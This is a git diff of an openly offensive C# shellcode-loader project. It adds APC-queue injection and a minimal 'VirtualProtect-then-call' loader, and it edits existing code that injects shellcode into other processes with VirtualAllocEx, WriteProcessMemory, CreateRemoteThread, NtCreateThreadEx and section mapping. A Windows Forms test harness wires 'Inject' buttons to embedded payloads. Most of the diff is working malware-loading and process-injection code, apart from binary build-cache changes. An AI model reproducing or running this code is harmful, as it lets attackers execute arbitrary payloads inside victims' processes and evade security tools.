diff --git a/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index f7f15e4..5dfb61c 100644
Binary files a/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/MapView.cs b/ShellCodeLoader/MapView.cs
index ba470c9..9c6c006 100644
--- a/ShellCodeLoader/MapView.cs
+++ b/ShellCodeLoader/MapView.cs
@@ -45,6 +45,7 @@ private void NtMapView()
UInt64 localOffset = 0;
Imports.NtMapViewOfSection(hSectionHandle, Process.GetCurrentProcess().Handle, ref pLocalView, UIntPtr.Zero, UIntPtr.Zero, ref localOffset, ref RegionSize, Imports.VIEWUNMAP, 0, PageProtection.PAGE_READWRITE);
+
UInt64 remoteOffset = 0;
IntPtr pRemoteView = IntPtr.Zero;
Imports.NtMapViewOfSection(hSectionHandle, Target.Handle, ref pRemoteView, UIntPtr.Zero, UIntPtr.Zero, ref remoteOffset, ref RegionSize, Imports.VIEWUNMAP, 0, PageProtection.PAGE_EXECUTE_READ);
diff --git a/ShellCodeLoader/QueueAPC.cs b/ShellCodeLoader/QueueAPC.cs
new file mode 100644
index 0000000..ff4cf10
--- /dev/null
+++ b/ShellCodeLoader/QueueAPC.cs
@@ -0,0 +1,133 @@
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using System.Threading;
+using static ShellCodeLoader.Shared;
+/*
+|| AUTHOR Arsium ||
+|| github : https://github.com/arsium ||
+|| Please let this credit for all the time I worked on ||
+|| Guide & Inspirations : https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection
+*/
+namespace ShellCodeLoader
+{
+ public class QueueAPC : IDisposable
+ {
+
+ private byte[] ShellCode;
+ private uint RegionSize;
+ private Process Target;
+ private bool NewThread;
+
+ public QueueAPC(byte[] shellCode, bool newThread = false)
+ {
+ this.ShellCode = shellCode;
+ this.RegionSize = (uint)shellCode.Length;
+ this.Target = Process.GetCurrentProcess();
+ this.NewThread = newThread;
+ }
+ private unsafe void CallBackQueueUserAPC(void* param)
+ {
+ IntPtr ptr = Imports.VirtualAllocEx(Target.Handle, IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, Shared.PageProtection.PAGE_EXECUTE_READWRITE);
+
+ UIntPtr writtenBytes;
+ Imports.WriteProcessMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+
+ PageProtection flOld;
+ Imports.VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READWRITE, out flOld);
+
+ ShellCodeCaller s = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ s();
+ }
+
+ private unsafe void QueueUserAPC()
+ {
+ if (NewThread)
+ {
+ new Thread(() =>
+ {
+ //https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
+ Imports.CallBack s = new Imports.CallBack(CallBackQueueUserAPC); //set our callback for APC (the callback is a classic shellcode loader
+
+ Imports.QueueUserAPC(s, Imports.GetCurrentThread(), IntPtr.Zero); //add apc to our thread
+
+ //Imports.SleepEx(0, true); //now we have to set an alertable for our thread : https://docs.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls
+ Imports.NtTestAlert(); //empty APC queue for the current thread
+
+ }).Start();
+ }
+ else
+ {
+ //https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
+ Imports.CallBack s = new Imports.CallBack(CallBackQueueUserAPC); //set our callback for APC (the callback is a classic shellcode loader
+
+ Imports.QueueUserAPC(s, Imports.GetCurrentThread(), IntPtr.Zero); //add apc to our thread
+
+ //Imports.SleepEx(0, true); //now we have to set an alertable for our thread : https://docs.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls
+ Imports.NtTestAlert(); //empty APC queue for the current thread
+ }
+ }
+
+ public void LoadWithQueueAPC()
+ {
+ QueueUserAPC();
+ }
+
+ private static class Imports
+ {
+ internal const String KERNEL32 = "kernel32.dll";
+ internal const String NTDLL = "ntdll.dll";
+
+
+ public unsafe delegate void CallBack(void* param);
+ public delegate void ShellCodeCaller();
+
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static unsafe extern uint QueueUserAPC(CallBack pFunction, IntPtr tHandle, IntPtr dwData);
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static unsafe extern uint SleepEx(uint dwMilliseconds, bool bAlertable);
+ [DllImport(NTDLL, SetLastError = true)]
+ public static extern uint NtTestAlert();
+
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr VirtualAllocEx(IntPtr procHandle, IntPtr address, IntPtr numBytes, Shared.TypeAlloc commitOrReserve, Shared.PageProtection pageProtectionMode);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, Shared.PageProtection flNewProtect, out Shared.PageProtection lpflOldProtect);
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr GetCurrentThread();
+ }
+
+ private bool _disposed = false;
+
+ // Instantiate a SafeHandle instance.
+ private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
+
+ // Public implementation of Dispose pattern callable by consumers.
+ public void Dispose() => Dispose(true);
+
+ // Protected implementation of Dispose pattern.
+ protected virtual void Dispose(bool disposing)
+ {
+ if (_disposed)
+ {
+ return;
+ }
+
+ if (disposing)
+ {
+ // Dispose managed state (managed objects).
+ _safeHandle?.Dispose();
+ }
+
+ _disposed = true;
+ GC.SuppressFinalize(this);
+ }
+ }
+}
diff --git a/ShellCodeLoader/Shared.cs b/ShellCodeLoader/Shared.cs
index 388361f..c307b99 100644
--- a/ShellCodeLoader/Shared.cs
+++ b/ShellCodeLoader/Shared.cs
@@ -1,15 +1,19 @@
using System;
+using System.Runtime.InteropServices;
/*
|| AUTHOR Arsium ||
|| github : https://github.com/arsium ||
|| Please let this credit for all the time I worked on ||
- */
+*/
namespace ShellCodeLoader
{
internal class Shared
{
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ internal delegate void ShellCodeCaller();
+
[Flags]
- public enum TypeAlloc : uint
+ internal enum TypeAlloc : uint
{
MEM_COMMIT = 0x00001000,
MEM_RESERVE = 0x00002000,
@@ -22,7 +26,7 @@ public enum TypeAlloc : uint
}
[Flags]
- public enum FreeType : uint
+ internal enum FreeType : uint
{
MEM_DECOMMIT = 0x00004000,
MEM_RELEASE = 0x00008000,
@@ -31,7 +35,7 @@ public enum FreeType : uint
}
[Flags]
- public enum PageProtection : uint
+ internal enum PageProtection : uint
{
PAGE_EXECUTE = 0x10,
PAGE_EXECUTE_READ = 0x20,
@@ -49,7 +53,7 @@ public enum PageProtection : uint
}
[Flags]
- public enum AccessMask : uint
+ internal enum AccessMask : uint
{
GENERIC_READ = 0x80000000,
GENERIC_WRITE = 0x40000000,
diff --git a/ShellCodeLoader/ShellCodeLoader.cs b/ShellCodeLoader/ShellCodeLoader.cs
index ea3e973..d995fa3 100644
--- a/ShellCodeLoader/ShellCodeLoader.cs
+++ b/ShellCodeLoader/ShellCodeLoader.cs
@@ -22,9 +22,6 @@ public class ShellCodeLoader : IDisposable
///
public bool Asynchronous { get; set; }
- [UnmanagedFunctionPointer(CallingConvention.StdCall)]
- private delegate void ShellCodeCaller();
-
public ShellCodeLoader(byte[] shellCode)
{
this.ShellCode = shellCode;
@@ -89,25 +86,33 @@ public void LoadWithKernel32Delegates()
private void NT()
{
- Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+ Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+
UIntPtr bytesWritten;
- Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+ Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+
PageProtection flOld = new PageProtection();
- Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
+ Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
+
ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
load();
+
Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, FreeType.MEM_RELEASE);
}
private void Kernel32()
{
- this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+ this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+
UIntPtr writtenBytes;
- Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+ Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+
PageProtection flOld;
- Imports.VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
+ Imports.VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
+
ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
load();
+
Imports.VirtualFree(ptr, (uint)0, FreeType.MEM_RELEASE);
}
diff --git a/ShellCodeLoader/ShellCodeLoader.csproj b/ShellCodeLoader/ShellCodeLoader.csproj
index 8e345b4..949dc02 100644
--- a/ShellCodeLoader/ShellCodeLoader.csproj
+++ b/ShellCodeLoader/ShellCodeLoader.csproj
@@ -56,10 +56,12 @@
+
+
\ No newline at end of file
diff --git a/ShellCodeLoader/ShellCodeLoaderEx.cs b/ShellCodeLoader/ShellCodeLoaderEx.cs
index 3330bd4..b605fde 100644
--- a/ShellCodeLoader/ShellCodeLoaderEx.cs
+++ b/ShellCodeLoader/ShellCodeLoaderEx.cs
@@ -39,9 +39,12 @@ private void NT()
{
Imports.NtAllocateVirtualMemory(Target.Handle, ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
UIntPtr bytesWritten;
+
Imports.NtWriteVirtualMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+
PageProtection flOld = new PageProtection();
Imports.NtProtectVirtualMemory(Target.Handle, ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
+
IntPtr hThread = IntPtr.Zero;
Imports.NtCreateThreadEx(ref hThread, AccessMask.GENERIC_EXECUTE, IntPtr.Zero, Target.Handle, ptr, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
//
@@ -52,10 +55,13 @@ private void NT()
private void Kernel32()
{
this.ptr = Imports.VirtualAllocEx(Target.Handle, IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+
UIntPtr writtenBytes;
Imports.WriteProcessMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+
PageProtection flOld;
Imports.VirtualProtectEx(Target.Handle, ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
+
IntPtr hThread = Imports.CreateRemoteThread(Target.Handle, IntPtr.Zero, 0, ptr, IntPtr.Zero, Imports.ThreadCreationFlags.NORMAL, out hThread);
}
diff --git a/ShellCodeLoader/ShellCodeLoaderMinimalNativeAPI.cs b/ShellCodeLoader/ShellCodeLoaderMinimalNativeAPI.cs
new file mode 100644
index 0000000..6fe3be3
--- /dev/null
+++ b/ShellCodeLoader/ShellCodeLoaderMinimalNativeAPI.cs
@@ -0,0 +1,83 @@
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Runtime.InteropServices;
+using System.Threading;
+using System.Threading.Tasks;
+using static ShellCodeLoader.Shared;
+
+namespace ShellCodeLoader
+{
+ public class ShellCodeLoaderMinimalNativeAPI : IDisposable
+ {
+ private byte[] ShellCode;
+ private uint RegionSize;
+ ///
+ /// Default is false.
+ ///
+ public bool Asynchronous { get; set; }
+
+
+ public ShellCodeLoaderMinimalNativeAPI(byte[] shellCode)
+ {
+ this.ShellCode = shellCode;
+ this.RegionSize = (uint)shellCode.Length;
+ this.Asynchronous = false;
+ }
+
+ public void LoadWithMinimalAPI()
+ {
+ if (this.Asynchronous)
+ {
+ Task.Factory.StartNew(() => { MinimalAPI(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
+ }
+ else
+ {
+ MinimalAPI();
+ }
+ }
+ private unsafe void MinimalAPI()
+ {
+ fixed(void* ptr = &this.ShellCode[0])
+ {
+ PageProtection flOld;
+ Imports.VirtualProtect((IntPtr)ptr, RegionSize, Shared.PageProtection.PAGE_EXECUTE_READWRITE, out flOld);
+
+ ShellCodeCaller s = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer((IntPtr)ptr, typeof(ShellCodeCaller));
+ s();
+ }
+ }
+ internal static class Imports
+ {
+
+ internal const String KERNEL32 = "kernel32.dll";
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, Shared.PageProtection flNewProtect, out Shared.PageProtection lpflOldProtect);
+ }
+
+ private bool _disposed = false;
+
+ // Instantiate a SafeHandle instance.
+ private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
+
+ // Public implementation of Dispose pattern callable by consumers.
+ public void Dispose() => Dispose(true);
+
+ // Protected implementation of Dispose pattern.
+ protected virtual void Dispose(bool disposing)
+ {
+ if (_disposed)
+ {
+ return;
+ }
+
+ if (disposing)
+ {
+ // Dispose managed state (managed objects).
+ _safeHandle?.Dispose();
+ }
+
+ _disposed = true;
+ GC.SuppressFinalize(this);
+ }
+ }
+}
diff --git a/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index 90de0fd..7494a0d 100644
Binary files a/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache
index 4f18f8f..204fdef 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache and b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
index 209fbb4..c245c3c 100644
--- a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
+++ b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-b025bf862b326d406604d35fe513ad97e74800ce
+d13612e3ee84b59d0abdaff95468991f181618fb
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll
index 750feb2..58efb2a 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll and b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll differ
diff --git a/Test/Form1.Designer.cs b/Test/Form1.Designer.cs
index 280606d..8fbceda 100644
--- a/Test/Form1.Designer.cs
+++ b/Test/Form1.Designer.cs
@@ -39,9 +39,11 @@ private void InitializeComponent()
this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components);
this.injectToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.injectWithMapViewToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.refreshToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.button5 = new System.Windows.Forms.Button();
- this.injectWithMapViewToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.button6 = new System.Windows.Forms.Button();
+ this.button7 = new System.Windows.Forms.Button();
this.contextMenuStrip1.SuspendLayout();
this.SuspendLayout();
//
@@ -114,19 +116,26 @@ private void InitializeComponent()
this.injectWithMapViewToolStripMenuItem,
this.refreshToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
- this.contextMenuStrip1.Size = new System.Drawing.Size(184, 92);
+ this.contextMenuStrip1.Size = new System.Drawing.Size(184, 70);
//
// injectToolStripMenuItem
//
this.injectToolStripMenuItem.Name = "injectToolStripMenuItem";
- this.injectToolStripMenuItem.Size = new System.Drawing.Size(113, 22);
+ this.injectToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
this.injectToolStripMenuItem.Text = "Inject";
this.injectToolStripMenuItem.Click += new System.EventHandler(this.injectToolStripMenuItem_Click);
//
+ // injectWithMapViewToolStripMenuItem
+ //
+ this.injectWithMapViewToolStripMenuItem.Name = "injectWithMapViewToolStripMenuItem";
+ this.injectWithMapViewToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
+ this.injectWithMapViewToolStripMenuItem.Text = "Inject With MapView";
+ this.injectWithMapViewToolStripMenuItem.Click += new System.EventHandler(this.injectWithMapViewToolStripMenuItem_Click);
+ //
// refreshToolStripMenuItem
//
this.refreshToolStripMenuItem.Name = "refreshToolStripMenuItem";
- this.refreshToolStripMenuItem.Size = new System.Drawing.Size(113, 22);
+ this.refreshToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
this.refreshToolStripMenuItem.Text = "Refresh";
this.refreshToolStripMenuItem.Click += new System.EventHandler(this.refreshToolStripMenuItem_Click);
//
@@ -140,18 +149,33 @@ private void InitializeComponent()
this.button5.UseVisualStyleBackColor = true;
this.button5.Click += new System.EventHandler(this.button5_Click);
//
- // injectWithMapViewToolStripMenuItem
+ // button6
//
- this.injectWithMapViewToolStripMenuItem.Name = "injectWithMapViewToolStripMenuItem";
- this.injectWithMapViewToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
- this.injectWithMapViewToolStripMenuItem.Text = "Inject With MapView";
- this.injectWithMapViewToolStripMenuItem.Click += new System.EventHandler(this.injectWithMapViewToolStripMenuItem_Click);
+ this.button6.Location = new System.Drawing.Point(294, 89);
+ this.button6.Name = "button6";
+ this.button6.Size = new System.Drawing.Size(121, 59);
+ this.button6.TabIndex = 6;
+ this.button6.Text = "Local QueueAPC";
+ this.button6.UseVisualStyleBackColor = true;
+ this.button6.Click += new System.EventHandler(this.button6_Click);
+ //
+ // button7
+ //
+ this.button7.Location = new System.Drawing.Point(436, 12);
+ this.button7.Name = "button7";
+ this.button7.Size = new System.Drawing.Size(121, 59);
+ this.button7.TabIndex = 7;
+ this.button7.Text = "Minimal API";
+ this.button7.UseVisualStyleBackColor = true;
+ this.button7.Click += new System.EventHandler(this.button7_Click);
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
- this.ClientSize = new System.Drawing.Size(493, 415);
+ this.ClientSize = new System.Drawing.Size(569, 356);
+ this.Controls.Add(this.button7);
+ this.Controls.Add(this.button6);
this.Controls.Add(this.button5);
this.Controls.Add(this.listView1);
this.Controls.Add(this.button4);
@@ -179,6 +203,8 @@ private void InitializeComponent()
private System.Windows.Forms.ToolStripMenuItem refreshToolStripMenuItem;
private System.Windows.Forms.Button button5;
private System.Windows.Forms.ToolStripMenuItem injectWithMapViewToolStripMenuItem;
+ private System.Windows.Forms.Button button6;
+ private System.Windows.Forms.Button button7;
}
}
diff --git a/Test/Form1.cs b/Test/Form1.cs
index 2289388..885bbb4 100644
--- a/Test/Form1.cs
+++ b/Test/Form1.cs
@@ -164,6 +164,29 @@ private void button5_Click(object sender, EventArgs e)
}
}
+
+ private void button6_Click(object sender, EventArgs e)
+ {
+ if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp64.rawData);
+ ShellCodeLoader.QueueAPC csharp = new ShellCodeLoader.QueueAPC(PayloadCSharp64.rawData, true);
+ cpp.LoadWithQueueAPC();
+ csharp.LoadWithQueueAPC();
+ cpp.Dispose();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp32.rawData, true);
+ ShellCodeLoader.QueueAPC csharp = new ShellCodeLoader.QueueAPC(PayloadCSharp32.rawData, true);
+ cpp.LoadWithQueueAPC();
+ csharp.LoadWithQueueAPC();
+ cpp.Dispose();
+ csharp.Dispose();
+ }
+ }
+
private void injectWithMapViewToolStripMenuItem_Click(object sender, EventArgs e)
{
Process Target = Process.GetProcessesByName(listView1.SelectedItems[0].SubItems[1].Text)[0];
@@ -174,5 +197,29 @@ private void injectWithMapViewToolStripMenuItem_Click(object sender, EventArgs e
cpp.Dispose();
csharp.Dispose();
}
+
+ private void button7_Click(object sender, EventArgs e)
+ {
+ if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp64.rawData);
+ ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI csharp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCSharp64.rawData);
+ cpp.Asynchronous = true;
+ csharp.Asynchronous = true;
+ cpp.LoadWithMinimalAPI();
+ csharp.LoadWithMinimalAPI();
+ cpp.Dispose();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp32.rawData);
+ ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI csharp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCSharp32.rawData);
+ cpp.LoadWithMinimalAPI();
+ csharp.LoadWithMinimalAPI();
+ cpp.Dispose();
+ csharp.Dispose();
+ }
+ }
}
}
diff --git a/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index 72ba5b5..c7f583d 100644
Binary files a/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache b/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache
index 29e521b..85eb605 100644
Binary files a/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache and b/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache differ
diff --git a/Test/obj/Release/Test.csproj.GenerateResource.cache b/Test/obj/Release/Test.csproj.GenerateResource.cache
index 9b03a0a..c3cddc7 100644
Binary files a/Test/obj/Release/Test.csproj.GenerateResource.cache and b/Test/obj/Release/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/Release/Test.exe b/Test/obj/Release/Test.exe
index b6a37ab..b3a968d 100644
Binary files a/Test/obj/Release/Test.exe and b/Test/obj/Release/Test.exe differ
diff --git a/Test/obj/Release/Test.pdb b/Test/obj/Release/Test.pdb
index 897a0c6..7627cb5 100644
Binary files a/Test/obj/Release/Test.pdb and b/Test/obj/Release/Test.pdb differ
diff --git a/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache b/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
index ba952a2..ebca0dd 100644
Binary files a/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache and b/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache b/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache
index 204fdef..6a3d9da 100644
Binary files a/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache and b/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/x64/Release/Test.csproj.GenerateResource.cache b/Test/obj/x64/Release/Test.csproj.GenerateResource.cache
index 9b03a0a..c3cddc7 100644
Binary files a/Test/obj/x64/Release/Test.csproj.GenerateResource.cache and b/Test/obj/x64/Release/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/x64/Release/Test.exe b/Test/obj/x64/Release/Test.exe
index 3b9a6da..0068aa3 100644
Binary files a/Test/obj/x64/Release/Test.exe and b/Test/obj/x64/Release/Test.exe differ
diff --git a/Test/obj/x64/Release/Test.pdb b/Test/obj/x64/Release/Test.pdb
index 343309c..ac186c4 100644
Binary files a/Test/obj/x64/Release/Test.pdb and b/Test/obj/x64/Release/Test.pdb differ